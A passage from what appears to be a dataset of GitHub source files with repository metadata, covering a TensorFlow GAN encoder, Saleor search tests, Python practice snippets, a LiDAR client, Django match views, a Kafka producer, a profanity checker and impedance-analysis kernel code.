d_h, d_w, 1])\r\n\r\n biases = tf.get_variable('biases', [output_shape[-1]], initializer=tf.constant_initializer(0.0))\r\n deconv = tf.reshape(tf.nn.bias_add(deconv, biases), output_shape)\r\n\r\n if with_w:\r\n return deconv, w, biases\r\n else:\r\n return deconv\r\n\r\n\r\ndef lrelu(x, leak=0.2, name=\"lrelu\"):\r\n \"\"\"Compose specified tensor with leaky Rectifier Linear Unit\"\"\"\r\n return tf.maximum(x, leak*x)\r\n\r\n\r\ndef linear(input_, output_size, scope=None, stddev=0.02, bias_start=0.0, with_w=False):\r\n \"\"\"\r\n Compose specified tensor with linear (fully-connected) layer\r\n\r\n Args:\r\n input_: tensor to compose. Shape: [N, M]\r\n output_size: number of output neurons\r\n scope: name scope\r\n stddev: standard deviation of gaussian distribution to use for random weight initialization\r\n name: name scope\r\n with_w: whether to also return parameter variables\r\n\r\n Returns:\r\n Composed tensor. Shape: [N, output_size]\r\n \"\"\"\r\n shape = input_.get_shape().as_list()\r\n\r\n with tf.variable_scope(scope or \"Linear\"):\r\n matrix = tf.get_variable(\"Matrix\", [shape[1], output_size], tf.float32,\r\n tf.random_normal_initializer(stddev=stddev))\r\n bias = tf.get_variable(\"bias\", [output_size],\r\n initializer=tf.constant_initializer(bias_start))\r\n if with_w:\r\n return tf.matmul(input_, matrix) + bias, matrix, bias\r\n else:\r\n return tf.matmul(input_, matrix) + bias\r\n\r\n\r\nclass UserModel(Tower):\r\n \"\"\"\r\n User Model definition\r\n\r\n DIGITS creates an instance of this class for every tower it needs\r\n to create. This includes:\r\n - one for training,\r\n - one for validation,\r\n - one for testing.\r\n\r\n In the case of multi-GPU training, one training instance is created\r\n for every GPU. DIGITS takes care of doing the gradient averaging\r\n across GPUs so this class only needs to define the inference op\r\n and desired loss/cost function.\r\n \"\"\"\r\n\r\n def __init__(self, *args, **kwargs):\r\n \"\"\"\r\n Identify the correct input nodes.\r\n\r\n In the parent class, DIGITS conveniently sets the following fields:\r\n - self.is_training: whether this is a training graph\r\n - self.is_inference: whether this graph is created for inference/testing\r\n - self.x: input node. Shape: [N, H, W, C]\r\n - self.y: label. Shape: [N] for scalar labels, [N, H, W, C] otherwise.\r\n Only defined if self._is_training is True\r\n \"\"\"\r\n super(UserModel, self).__init__(*args, **kwargs)\r\n\r\n image_size = 64\r\n output_size = 64\r\n c_dim = 3\r\n z_dim = 100\r\n\r\n self.dcgan_init(image_size=image_size,\r\n output_size=output_size,\r\n c_dim=c_dim,\r\n z_dim=z_dim)\r\n\r\n @model_property\r\n def inference(self):\r\n \"\"\" op to use for inference \"\"\"\r\n\r\n # scale back to [0, 255] range\r\n images = (self.G * 127) + 128\r\n images_flat = tf.reshape(images, [self.batch_size, self.image_size * self.image_size * self.c_dim])\r\n # concatenate encoded z and generated image into a single flat structure\r\n zgen_flat = tf.reshape(self.DzGEN, [self.batch_size, self.z_dim])\r\n return tf.concat([zgen_flat, images_flat], 1)\r\n\r\n @model_property\r\n def loss(self):\r\n \"\"\"\r\n Loss function\r\n\r\n Returns either an op or a list of dicts.\r\n If the returned value is an op then DIGITS will optimize against this op\r\n with respect to all trainable variables.\r\n If the returned value is a list then DIGITS will optimize against each\r\n loss in the list with respect to the specified variables.\r\n \"\"\"\r\n\r\n # here we are returning a list because we want to alternately optimize the\r\n # discriminator and the generator.\r\n\r\n losses = [\r\n {'loss': self.dzgen_loss, 'vars': self.d_vars},\r\n ]\r\n return losses\r\n\r\n def dcgan_init(self,\r\n image_size,\r\n output_size,\r\n z_dim,\r\n c_dim,\r\n gf_dim=64,\r\n df_dim=64,\r\n gfc_dim=1024,\r\n dfc_dim=1024):\r\n \"\"\"\r\n\r\n Args:\r\n output_size: (optional) The resolution in pixels of the images. [64]\r\n z_dim: (optional) Dimension of dim for Z. [100]\r\n gf_dim: (optional) Dimension of gen filters in first conv layer. [64]\r\n df_dim: (optional) Dimension of discrim filters in first conv layer. [64]\r\n gfc_dim: (optional) Dimension of gen units for for fully connected layer. [1024]\r\n dfc_dim: (optional) Dimension of discrim units for fully connected layer. [1024]\r\n c_dim: (optional) Dimension of image color. For grayscale input, set to 1. [3]\r\n \"\"\"\r\n self.image_size = image_size\r\n self.output_size = output_size\r\n\r\n self.z_dim = z_dim\r\n\r\n self.gf_dim = gf_dim\r\n self.df_dim = df_dim\r\n\r\n self.gfc_dim = gfc_dim\r\n self.dfc_dim = dfc_dim\r\n\r\n self.c_dim = c_dim\r\n\r\n self.batch_size = tf.shape(self.x)[0]\r\n\r\n self.soft_label_margin = 0.1\r\n\r\n # batch normalization : deals with poor initialization helps gradient flow\r\n self.d_bn1 = batch_norm(name='d_bn1')\r\n self.d_bn2 = batch_norm(name='d_bn2')\r\n self.d_bn3 = batch_norm(name='d_bn3')\r\n\r\n self.g_bn0 = batch_norm(name='g_bn0')\r\n self.g_bn1 = batch_norm(name='g_bn1')\r\n self.g_bn2 = batch_norm(name='g_bn2')\r\n self.g_bn3 = batch_norm(name='g_bn3')\r\n\r\n self.build_model()\r\n\r\n def build_model(self):\r\n\r\n # reshape/rescale x\r\n self.images = (tf.reshape(self.x, shape=[self.batch_size,\r\n self.image_size,\r\n self.image_size,\r\n self.c_dim],\r\n name='x_reshaped') - 128) / 127.\r\n\r\n # create discriminator/encoder\r\n self.DzGEN, self.D_logits = self.discriminator(self.images, reuse=False)\r\n # create generator\r\n self.G = self.generator(self.DzGEN)\r\n # loss is now L2 distance between input image and generator output\r\n self.dzgen_loss = tf.reduce_mean(tf.square(self.G - self.images), name=\"loss_DzGEN\")\r\n\r\n # debug\r\n self.summaries.append(image_summary(\"G\", self.G, max_outputs=3))\r\n self.summaries.append(image_summary(\"X\", self.images, max_outputs=3))\r\n self.summaries.append(histogram_summary(\"G_hist\", self.G))\r\n self.summaries.append(histogram_summary(\"X_hist\", self.images))\r\n self.summaries.append(scalar_summary(\"DzGen_loss\", self.dzgen_loss))\r\n\r\n # all trainable variables\r\n t_vars = tf.trainable_variables()\r\n # d variables\r\n self.d_vars = [var for var in t_vars if 'd_' in var.name]\r\n\r\n def discriminator(self, image, y=None, reuse=False):\r\n \"\"\"\r\n Create the discriminator\r\n\r\n This creates a string of layers:\r\n - input - [N, 64, 64, 3]\r\n - conv layer with 64 5x5 kernels and 2x2 stride - [N, 32, 32, 64]\r\n - leaky relu - [N, 32, 32, 64]\r\n - conv layer with 128 5x5 kernels and 2x2 stride - [N, 16, 16, 32]\r\n - batch norm - [N, 16, 16, 32]\r\n - leaky relu - [N, 16, 16, 32]\r\n - conv layer with 256 5x5 kernels and 2x2 stride - [N, 8, 8, 256]\r\n - batch norm - [N, 8, 8, 256]\r\n - leaky relu - [N, 8, 8, 256]\r\n - conv layer with 256 5x5 kernels and 2x2 stride - [N, 4, 4, 512]\r\n - batch norm - [N, 4, 4, 512]\r\n - leaky relu - [N, 4, 4, 512]\r\n - flatten - [N, 8192]\r\n - linear layer with 1 output neurons - [N, 1]\r\n - sigmoid - [N,1]\r\n\r\n Args:\r\n image: batch of input images - shape: [N, H, W, C]\r\n y: batch of one-hot encoded labels - shape: [N, K]\r\n reuse: whether to re-use previously created variables\r\n \"\"\"\r\n\r\n # NOTE: although we are really creating an encoder here we need to re-use the same\r\n # variable scope (i.e. \"discriminator\") as in the original GAN so we can re-use\r\n # learned parameters\r\n with tf.variable_scope(\"discriminator\") as scope:\r\n if reuse:\r\n scope.reuse_variables()\r\n\r\n h0 = lrelu(conv2d(image, self.df_dim, name='d_h0_conv'))\r\n h1 = lrelu(self.d_bn1(conv2d(h0, self.df_dim*2, name='d_h1_conv'), train=self.is_training))\r\n h2 = lrelu(self.d_bn2(conv2d(h1, self.df_dim*4, name='d_h2_conv'), train=self.is_training))\r\n h3 = lrelu(self.d_bn3(conv2d(h2, self.df_dim*8, name='d_h3_conv'), train=self.is_training))\r\n h3_size = ((self.output_size // 16) ** 2) * self.df_dim * 8\r\n h4 = linear(tf.reshape(h3, [self.batch_size, h3_size]), self.z_dim, 'd_h3_lin_retrain')\r\n return h4, h4\r\n\r\n def generator(self, z, y=None):\r\n \"\"\"\r\n Create the generator\r\n\r\n This creates a string of layers:\r\n - input - [N, 100]\r\n - linear layer with 8192 output neurons - [N, 8192]\r\n - reshape - [N, 4, 4, 512]\r\n - batch norm - [N, 4, 4, 512]\r\n - relu - [N, 4, 4, 512]\r\n - transpose convolution with 256 filters and stride 2 - [N, 8, 8, 256]\r\n - batch norm - [N, 8, 8, 256]\r\n - relu - [N, 8, 8, 256]\r\n - transpose convolution with 128 filters and stride 2 - [N, 16, 16, 128]\r\n - batch norm - [N, 16, 16, 128]\r\n - relu - [N, 16, 16, 128]\r\n - transpose convolution with 64 filters and stride 2 - [N, 32, 32, 64]\r\n - batch norm - [N, 32, 32, 64]\r\n - relu - [N, 32, 32, 64]\r\n - transpose convolution with 3 filters and stride 2 - [N, 64, 64, 3]\r\n - tanh - [N, 64, 64, 3]\r\n \"\"\"\r\n with tf.variable_scope(\"generator\"):\r\n s = self.output_size\r\n s2, s4, s8, s16 = int(s/2), int(s/4), int(s/8), int(s/16)\r\n\r\n # project `z` and reshape\r\n self.z_, self.h0_w, self.h0_b = linear(z, self.gf_dim*8*s16*s16, 'g_h0_lin', with_w=True)\r\n\r\n self.h0 = tf.reshape(self.z_, [-1, s16, s16, self.gf_dim * 8])\r\n h0 = tf.nn.relu(self.g_bn0(self.h0, train=False))\r\n\r\n self.h1, self.h1_w, self.h1_b = deconv2d(h0, [self.batch_size, s8, s8, self.gf_dim*4],\r\n name='g_h1', with_w=True)\r\n h1 = tf.nn.relu(self.g_bn1(self.h1, train=False))\r\n\r\n h2, self.h2_w, self.h2_b = deconv2d(h1, [self.batch_size, s4, s4, self.gf_dim*2],\r\n name='g_h2', with_w=True)\r\n h2 = tf.nn.relu(self.g_bn2(h2, train=False))\r\n\r\n h3, self.h3_w, self.h3_b = deconv2d(h2, [self.batch_size, s2, s2, self.gf_dim*1],\r\n name='g_h3', with_w=True)\r\n h3 = tf.nn.relu(self.g_bn3(h3, train=False))\r\n\r\n h4, self.h4_w, self.h4_b = deconv2d(h3, [self.batch_size, s, s, self.c_dim],\r\n name='g_h4', with_w=True)\r\n\r\n return tf.nn.tanh(h4)\r\n","repo_name":"NVIDIA/DIGITS","sub_path":"examples/gan/network-celebA-encoder.py","file_name":"network-celebA-encoder.py","file_ext":"py","file_size_in_byte":16138,"program_lang":"python","lang":"en","doc_type":"code","stars":4106,"dataset":"github-code","pt":"48"} +{"seq_id":"73156028627","text":"from ...attribute import AttributeInputType, AttributeType\nfrom ...attribute.models import Attribute, AttributeValue\nfrom ...attribute.utils import associate_attribute_values_to_instance\nfrom ...core.utils.editorjs import clean_editor_js\nfrom ..models import Product, ProductVariant\nfrom ..search import (\n prepare_product_search_document_value,\n update_product_search_document,\n update_products_search_document,\n)\n\n\ndef test_update_product_search_document(product_type, category):\n # given\n name = \"Test product\"\n description = \"Test description\"\n product = Product.objects.create(\n name=name,\n slug=\"test-product-111\",\n product_type=product_type,\n category=category,\n description_plaintext=description,\n )\n assert not product.search_document\n\n # when\n update_product_search_document(product)\n\n # then\n assert f\"{name}\\n{description}\\n\".lower() in product.search_document\n\n\ndef test_update_products_search_document(product_list):\n # given\n for product in product_list:\n product.search_document = \"\"\n Product.objects.bulk_update(product_list, [\"search_document\"])\n\n # when\n update_products_search_document(Product.objects.all())\n\n # then\n for product in product_list:\n product.refresh_from_db()\n assert product.search_document\n\n\ndef test_prepare_product_search_document_value_empty_product(product_type, category):\n # given\n name = \"Test product\"\n description = \"Test description\"\n product = Product.objects.create(\n name=name,\n slug=\"test-product-11\",\n product_type=product_type,\n category=category,\n description_plaintext=description,\n )\n\n # when\n search_document_value = prepare_product_search_document_value(product)\n\n # then\n assert search_document_value == f\"{name}\\n{description}\\n\".lower()\n\n\ndef test_prepare_product_search_document_value(\n category,\n product_type,\n rich_text_attribute_with_many_values,\n date_time_attribute,\n date_attribute,\n color_attribute,\n size_attribute,\n numeric_attribute,\n):\n # given\n multiselect_attribute = Attribute.objects.create(\n slug=\"modes\",\n name=\"Available Modes\",\n input_type=AttributeInputType.MULTISELECT,\n type=AttributeType.PRODUCT_TYPE,\n )\n\n multiselect_attr_val_1 = AttributeValue.objects.create(\n attribute=multiselect_attribute, name=\"Eco Mode\", slug=\"eco\"\n )\n multiselect_attr_val_2 = AttributeValue.objects.create(\n attribute=multiselect_attribute, name=\"Performance Mode\", slug=\"power\"\n )\n\n name = \"Test product\"\n description = \"Test description\"\n product = Product.objects.create(\n name=name,\n slug=\"test-product-11\",\n product_type=product_type,\n category=category,\n description_plaintext=description,\n )\n\n product_type.product_attributes.add(\n rich_text_attribute_with_many_values,\n date_time_attribute,\n color_attribute,\n numeric_attribute,\n )\n rich_text_val_1 = rich_text_attribute_with_many_values.values.first()\n date_time_value = date_time_attribute.values.first()\n color_attribute_value = color_attribute.values.first()\n numeric_attribute_value = numeric_attribute.values.first()\n associate_attribute_values_to_instance(\n product, rich_text_attribute_with_many_values, rich_text_val_1\n )\n associate_attribute_values_to_instance(\n product, date_time_attribute, date_time_value\n )\n associate_attribute_values_to_instance(\n product, color_attribute, color_attribute_value\n )\n associate_attribute_values_to_instance(\n product, numeric_attribute, numeric_attribute_value\n )\n\n variant = ProductVariant.objects.create(product=product, sku=\"123\")\n product_type.variant_attributes.add(\n rich_text_attribute_with_many_values,\n date_attribute,\n size_attribute,\n multiselect_attribute,\n )\n rich_text_val_2 = rich_text_attribute_with_many_values.values.last()\n size_attribute_value = size_attribute.values.first()\n date_attribute_value = date_attribute.values.first()\n associate_attribute_values_to_instance(\n variant, rich_text_attribute_with_many_values, rich_text_val_2\n )\n associate_attribute_values_to_instance(\n variant, size_attribute, size_attribute_value\n )\n associate_attribute_values_to_instance(\n variant, date_attribute, date_attribute_value\n )\n\n variant_2 = ProductVariant.objects.create(product=product, sku=\"123ABC\")\n associate_attribute_values_to_instance(\n variant_2, multiselect_attribute, multiselect_attr_val_1, multiselect_attr_val_2\n )\n\n # when\n search_document_value = prepare_product_search_document_value(product)\n\n # then\n assert f\"{name}\\n{description}\\n\".lower() in search_document_value\n assert variant.sku.lower() in search_document_value\n assert variant_2.sku.lower() in search_document_value\n\n # check if product attributes are in search_document_value\n assert (\n clean_editor_js(rich_text_val_1.rich_text, to_string=True).lower()\n in search_document_value\n )\n assert date_time_value.date_time.isoformat().lower() in search_document_value\n assert color_attribute_value.name.lower() in search_document_value\n assert (\n f\"{numeric_attribute_value.name}{numeric_attribute.unit}\"\n in search_document_value\n )\n\n # check if variant attributes are in search_document_value\n assert (\n clean_editor_js(rich_text_val_2.rich_text, to_string=True).lower()\n in search_document_value\n )\n assert size_attribute_value.name.lower() in search_document_value\n assert date_attribute_value.date_time.isoformat().lower() in search_document_value\n assert multiselect_attr_val_1.name.lower() in search_document_value\n assert multiselect_attr_val_2.name.lower() in search_document_value\n","repo_name":"cong1912/tien-shop","sub_path":"saleor/saleor/product/tests/test_product_search.py","file_name":"test_product_search.py","file_ext":"py","file_size_in_byte":5960,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"71465020625","text":"\ndef gg(fun):\n def hifi():\n print(\"hifi\")\n fun()\n print(\"done\")\n return hifi\n@gg\ndef hi():\n print(\"hi some is happend\")\n \nhi()\n\n\ndef ap(x,v):\n x.append(55)\n v=v+5\n \nl=[45]\nv = 5\nap(l,v)\nprint(l,v)\n\ndef fibbo(n):\n if n==0:\n return 0\n if n==1:\n return 1\n ans = fibbo(n-1)+fibbo(n-2)\n return ans\nfor i in range(16):\n print(fibbo(i))\n \ndef saydigit(n,arr):\n if n== 0:\n return\n num = n %10\n n=n//10\n \n \n saydigit(n,arr)\n print(arr[num] , end=\" \")\n \nn = 456\narr = ['zero','one','two','three','four','five','six','seven','eight','nine']\nsaydigit(n,arr)","repo_name":"vivekvinchhi/python-practical-sets","sub_path":"dsa/sfvs.py","file_name":"sfvs.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35211017172","text":"\"\"\"\n서버에서 주는 라이다 데이터 받아서 단순히 그림만 그려주는 클라이언트\n해당하는 시간에 함께 로깅한 영상도 같이 틀어준다.\n2018-11\n\"\"\"\nimport socket\nimport numpy as np\nimport cv2\nimport threading\nimport time\n\nHOST = '127.0.0.1'\nPORT = 10018\nBUFF = 57600\ntimeLabel = \"2018-11-04-17-01-16\"\nMESG = timeLabel + \".txt\"\nRAD = 500\n\nflag = [False]\n\ndata_list = None\nstop = False\n\ncap_left = cv2.VideoCapture(\"c:\\\\pams-skku-data\\\\leftcam\\\\\" + timeLabel + \".avi\")\ncap_mid = cv2.VideoCapture(\"c:\\\\pams-skku-data\\\\signcam\\\\\" + timeLabel + \".avi\")\ncap_right = cv2.VideoCapture(\"c:\\\\pams-skku-data\\\\rightcam\\\\\" + timeLabel + \".avi\")\n\nsock_lidar = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsock_lidar.connect((HOST, PORT))\n\nsock_lidar.send(MESG.encode())\n\nwhile True:\n _, left = cap_left.read()\n _, mid = cap_mid.read()\n _, right = cap_right.read()\n\n cv2.imshow('left', left)\n cv2.imshow('right', right)\n cv2.imshow('mid', mid)\n\n current_frame = np.zeros((RAD, RAD * 2), np.uint8)\n points = np.full((361, 2), -1000, np.int) # 점 찍을 좌표들을 담을 어레이 (x, y), 멀리 -1000 으로 채워둠.\n data = sock_lidar.recv(BUFF).decode()\n\n if data.__contains__('sEA'):\n continue\n\n temp = data.split(' ')[116:477]\n\n try:\n data_list = [int(item, 16) for item in temp]\n for theta in range(0, 361):\n r = data_list[theta] / 10 # 차에서 장애물까지의 거리, 단위는 cm\n\n if 2 <= r: # 라이다 바로 앞 1cm 의 노이즈는 무시\n\n # r-theta 를 x-y 로 바꿔서 (실제에서의 위치, 단위는 cm)\n x = r * np.cos(np.radians(0.5 * theta))\n y = r * np.sin(np.radians(0.5 * theta))\n\n # 좌표 변환, 화면에서 보이는 좌표(왼쪽 위가 (0, 0))에 맞춰서 집어넣는다\n points[theta][0] = round(x) + RAD\n points[theta][1] = RAD - round(y)\n for point in points: # 장애물들에 대하여\n cv2.circle(current_frame, tuple(point), 2, 255, -1) # 캔버스에 점 찍기\n cv2.imshow(\"LiDAR\", current_frame)\n if cv2.waitKey(1) & 0xff == ord(' '): break\n except Exception:\n pass\n","repo_name":"HongBeenKim/pams-skku","sub_path":"data_logging_set/play_data_client.py","file_name":"play_data_client.py","file_ext":"py","file_size_in_byte":2265,"program_lang":"python","lang":"ko","doc_type":"code","stars":9,"dataset":"github-code","pt":"48"} +{"seq_id":"29674668846","text":"from django.contrib import messages\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.core.exceptions import PermissionDenied\n\nfrom django.urls import reverse_lazy\nfrom django.utils import timezone\nfrom django.views.generic import ListView, CreateView, UpdateView, TemplateView, DetailView\n\nfrom fifawc.users.models import User\nfrom match.forms import MatchForm\nfrom prediction.forms import PredictionForm\nfrom prediction.models import Prediction\nfrom .models import Country, Match\n\n\nclass LandingView(TemplateView):\n template_name = 'pages/home.html'\n\n def get_context_data(self, **kwargs):\n ctx = super().get_context_data(**kwargs)\n ctx['users'] = User.objects.all()\n return ctx\n\n\nclass CountryListView(LoginRequiredMixin, ListView):\n model = Country\n template_name = 'match/country/list.html'\n queryset = Country.objects.all().order_by('group').values('name', 'flag_image', 'group')\n\n\nclass MatchList(LoginRequiredMixin, ListView):\n model = Match\n template_name = 'match/match/list.html'\n queryset = model.objects.select_related('home', 'away', 'outcome', 'outcome__winning_team').order_by('-start_time')\n\n\nclass CreateMatch(LoginRequiredMixin, CreateView):\n model = Match\n template_name = 'match/match/form.html'\n form_class = MatchForm\n success_url = reverse_lazy('match:match-list')\n success_message = \"Successfully created match.\"\n\n def dispatch(self, request, *args, **kwargs):\n if not self.request.user.is_superuser:\n raise PermissionDenied\n return super().dispatch(request, *args, **kwargs)\n\n def get_success_url(self):\n messages.success(self.request, self.success_message)\n return self.success_url\n\n\nclass UpdateMatch(LoginRequiredMixin, UpdateView):\n model = Match\n template_name = 'match/match/form.html'\n form_class = MatchForm\n success_url = reverse_lazy('match:match-list')\n success_message = \"Successfully updated match.\"\n\n def dispatch(self, request, *args, **kwargs):\n if not self.request.user.is_superuser:\n raise PermissionDenied\n return super().dispatch(request, *args, **kwargs)\n\n def get_success_url(self):\n messages.success(self.request, self.success_message)\n return self.success_url\n\n\nclass MatchDetailOverview(LoginRequiredMixin, DetailView):\n model = Match\n template_name = 'match/match/detail.html'\n queryset = model.objects.select_related('outcome', 'outcome__most_foul', 'home', 'away')\n\n def existing_prediction(self):\n prediction = Prediction.objects.filter(match=self.object, user=self.request.user).select_related(\n 'user', 'match', 'match__home', 'match__away', 'most_foul')\n return prediction.exists(), prediction\n\n def prediction_deadline_exceeded(self):\n if self.object.start_time > timezone.now():\n return False\n return True\n\n def get_context_data(self, **kwargs):\n ctx = super().get_context_data(**kwargs)\n ctx['match_predictions'] = Prediction.objects.filter(match=self.object).select_related(\n 'user', 'match', 'match__home', 'match__away', 'most_foul', 'winning_team', 'match__outcome')\\\n .prefetch_related('user__my_points', 'user__my_points__match')\n predictions_exists, prediction_qs = self.existing_prediction()\n if predictions_exists:\n prediction_obj = prediction_qs.first()\n ctx['form'] = PredictionForm(initial={'prediction_id': prediction_obj.id,\n 'home_goal': prediction_obj.home_goal,\n 'away_goal': prediction_obj.away_goal,\n 'winning_team': prediction_obj.winning_team,\n 'red_card': prediction_obj.red_card,\n 'yellow_card': prediction_obj.yellow_card,\n 'penalty_goal': prediction_obj.penalty_goal,\n 'most_foul': prediction_obj.most_foul,\n 'bonus_answer': prediction_obj.bonus_answer}, match=self.object)\n else:\n ctx['form'] = PredictionForm(match=self.object)\n ctx['prediction_deadline_exceeded'] = self.prediction_deadline_exceeded()\n return ctx\n","repo_name":"tuxsisir/fifawc","sub_path":"match/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43039831627","text":"from confluent_kafka import Producer\nfrom faker import Faker\nimport json\n\np = Producer({'bootstrap.servers': 'b-2.xxxx.xxxx.xxxx.kafka.us-east-1.amazonaws.com:9092,b-1.xxxx.xxxx.xxxx.kafka.us-east-1.amazonaws.com:9092,b-3.xxxx.xxxx.xxxx.kafka.us-east-1.amazonaws.com:9092'})\n\ndef delivery_report(err, msg):\n\n if err is not None:\n print('Message delivery failed: {}'.format(err))\n else:\n print('Message delivered to {} [{}]'.format(msg.topic(), msg.partition()))\n\n\nfake = Faker('en_US')\n\ndef gen_ran_data(i):\n data = {}\n data[\"ID\"] = i\n data[\"name\"] = fake.name()\n data[\"address\"] = fake.address()\n data[\"Email-ID\"] = fake.safe_email()\n return data\n\nfor i in range(0, 1000):\n x = json.dumps(gen_ran_data(i))\n print(x)\n p.poll(0)\n p.produce('sampleTopic', x.encode('utf-8'), callback=delivery_report)\n\np.flush()\n","repo_name":"harshdev93/AWS-MSK-Sample-Producer-Consumer","sub_path":"msk-producer.py","file_name":"msk-producer.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39262450384","text":"import urllib\n\ndef read_text():\n quotes = open(\"C:\\sdrive\\prac\\movie_quotes.txt\")\n contents_of_file = quotes.read()\n print(contents_of_file)\n quotes.close()\n check_profanity(contents_of_file)\n\ndef check_profanity(text_to_check):\n connection = urllib.urlopen(\"http://www.wdyl.com/profanity?q=\"+text_to_check)\n output = connection.read()\n connection.close()\n\n connection = urllib.urlopen(\"http://isithackday.com/arrpi.php?text=\"+text_to_check)\n pirateSpeech = connection.read()\n connection.close()\n\n #print(output)\n \n if \"true\" in output:\n print(\"Profanity Alert!! - Why do you love\")\n elif \"false\" in output:\n print(\"This document has no curse words! - wdyl\")\n else:\n print(\"Could not scan the document properly.\")\n\n print(pirateSpeech)\n \n if \"true\" in pirateSpeech:\n print(\"Profanity Alert!! - Pirate Speech\")\n elif \"false\" in pirateSpeech:\n print(\"No curse words - Pirate Speech\")\n else:\n print(\"Not scanned the doc\")\n\n \n\n \n\nread_text()\n","repo_name":"vkirangoud/LearnPython","sub_path":"ud036/check_profanity.py","file_name":"check_profanity.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73599318866","text":"\nimport numpy as np\nfrom numpy import inf, pi\nfrom numpy.random import randn\nfrom numpy.linalg import cholesky\nfrom numpy.matlib import repmat\nfrom math import pi, log, exp\nfrom numpy import linalg as la\nfrom numpy import *\n\ndef kernel(log_tau, log_tau_prime, sigma_f, ell):\n\n return (sigma_f**2)*exp(-0.5/(ell**2)*((log_tau-log_tau_prime)**2))\n\ndef compute_K(log_tau_vec, sigma_f, ell):\n\n N_tau = log_tau_vec.size\n out_K = np.zeros((N_tau, N_tau))\n\n for m in range(0, N_tau):\n\n log_tau_m = log_tau_vec[m]\n\n for n in range(0, N_tau):\n\n log_tau_n = log_tau_vec[n]\n out_K[m,n] = kernel(log_tau_m, log_tau_n, sigma_f, ell)\n \n out_K = 0.5*(out_K+out_K.T)\n return out_K\n\ndef compute_A_re(freq_vec, tau_vec):\n \n omega_vec = 2.*pi*freq_vec\n log_tau_vec = np.log(tau_vec)\n\n # number of elements in tau and freqs\n N_tau = tau_vec.size\n N_f = freq_vec.size\n\n # define output function\n out_A_re = np.zeros((N_f, N_tau))\n\n # integrand\n f_re = lambda omega, log_tau: 1./(1+(omega*exp(log_tau))**2)\n\n for m in range(0, N_f):\n \n for n in range(0, N_tau):\n \n if n == 0:\n log_tau_center = log_tau_vec[n]\n log_tau_right = 0.5*(log_tau_vec[n]+log_tau_vec[n+1])\n\n Delta_np1 = log_tau_vec[n+1]-log_tau_vec[n]\n\n a_vec = 1/4*np.array([Delta_np1, Delta_np1])\n I_vec = np.array([f_re(omega_vec[m], log_tau_center), \n f_re(omega_vec[m], log_tau_right)])\n\n elif n == N_tau-1:\n log_tau_left = 0.5*(log_tau_vec[n-1]+log_tau_vec[n])\n log_tau_center = log_tau_vec[n]\n\n Delta_nm1 = log_tau_vec[n]-log_tau_vec[n-1]\n a_vec = 0.25*np.array([Delta_nm1, Delta_nm1])\n I_vec = np.array([f_re(omega_vec[m], log_tau_left), \n f_re(omega_vec[m], log_tau_center)])\n\n else:\n log_tau_left = 0.5*(log_tau_vec[n-1]+log_tau_vec[n])\n log_tau_center = log_tau_vec[n]\n log_tau_right = 0.5*(log_tau_vec[n]+log_tau_vec[n+1])\n\n Delta_nm1 = log_tau_vec[n]-log_tau_vec[n-1]\n Delta_np1 = log_tau_vec[n+1]-log_tau_vec[n]\n\n a_vec = 0.25*np.array([Delta_nm1, Delta_nm1+Delta_np1, Delta_np1])\n I_vec = np.array([f_re(omega_vec[m], log_tau_left), \n f_re(omega_vec[m], log_tau_center), \n f_re(omega_vec[m], log_tau_right)])\n\n out_A_re[m,n] = np.dot(a_vec, I_vec)\n \n return out_A_re\n\ndef compute_A_im(freq_vec, tau_vec):\n \n omega_vec = 2.*pi*freq_vec\n log_tau_vec = np.log(tau_vec)\n\n # number of elements in tau and freqs\n N_tau = tau_vec.size\n N_f = freq_vec.size\n\n # define output function\n out_A_im = np.zeros((N_f, N_tau))\n\n # integrand\n f_im = lambda omega, log_tau: -omega*exp(log_tau)/(1+(omega*exp(log_tau))**2)\n\n for m in range(0, N_f):\n \n for n in range(0, N_tau):\n \n if n == 0:\n log_tau_center = log_tau_vec[n]\n log_tau_right = 0.5*(log_tau_vec[n]+log_tau_vec[n+1])\n\n Delta_np1 = log_tau_vec[n+1]-log_tau_vec[n]\n\n a_vec = 1/4*np.array([Delta_np1, Delta_np1])\n I_vec = np.array([f_im(omega_vec[m], log_tau_center), \n f_im(omega_vec[m], log_tau_right)])\n\n elif n == N_tau-1:\n log_tau_left = 0.5*(log_tau_vec[n-1]+log_tau_vec[n])\n log_tau_center = log_tau_vec[n]\n\n Delta_nm1 = log_tau_vec[n]-log_tau_vec[n-1]\n a_vec = 0.25*np.array([Delta_nm1, Delta_nm1])\n I_vec = np.array([f_im(omega_vec[m], log_tau_left), \n f_im(omega_vec[m], log_tau_center)])\n\n else:\n log_tau_left = 0.5*(log_tau_vec[n-1]+log_tau_vec[n])\n log_tau_center = log_tau_vec[n]\n log_tau_right = 0.5*(log_tau_vec[n]+log_tau_vec[n+1])\n\n Delta_nm1 = log_tau_vec[n]-log_tau_vec[n-1]\n Delta_np1 = log_tau_vec[n+1]-log_tau_vec[n]\n\n a_vec = 0.25*np.array([Delta_nm1, Delta_nm1+Delta_np1, Delta_np1])\n I_vec = np.array([f_im(omega_vec[m], log_tau_left), \n f_im(omega_vec[m], log_tau_center), \n f_im(omega_vec[m], log_tau_right)])\n\n out_A_im[m,n] = np.dot(a_vec, I_vec)\n \n return out_A_im\n\n\n# Find the nearest positive-definite matrix\n\n#\"\"\"\n#Returns true when input is positive-definite, via Cholesky\n#is a matrix positive definite?\n#if input matrix is positive-definite (<=> Cholesky decomposable), then true is returned otherwise return false\n#\"\"\"\n\ndef is_PD(A):\n \n try:\n np.linalg.cholesky(A)\n return True\n except np.linalg.LinAlgError:\n return False\n\n\ndef nearest_PD(A):\n \n # based on \n # N.J. Higham (1988) https://doi.org/10.1016/0024-3795(88)90223-6\n # and \n # https://www.mathworks.com/matlabcentral/fileexchange/42885-nearestspd\n\n B = (A + A.T)/2\n _, Sigma_mat, V = la.svd(B)\n\n H = np.dot(V.T, 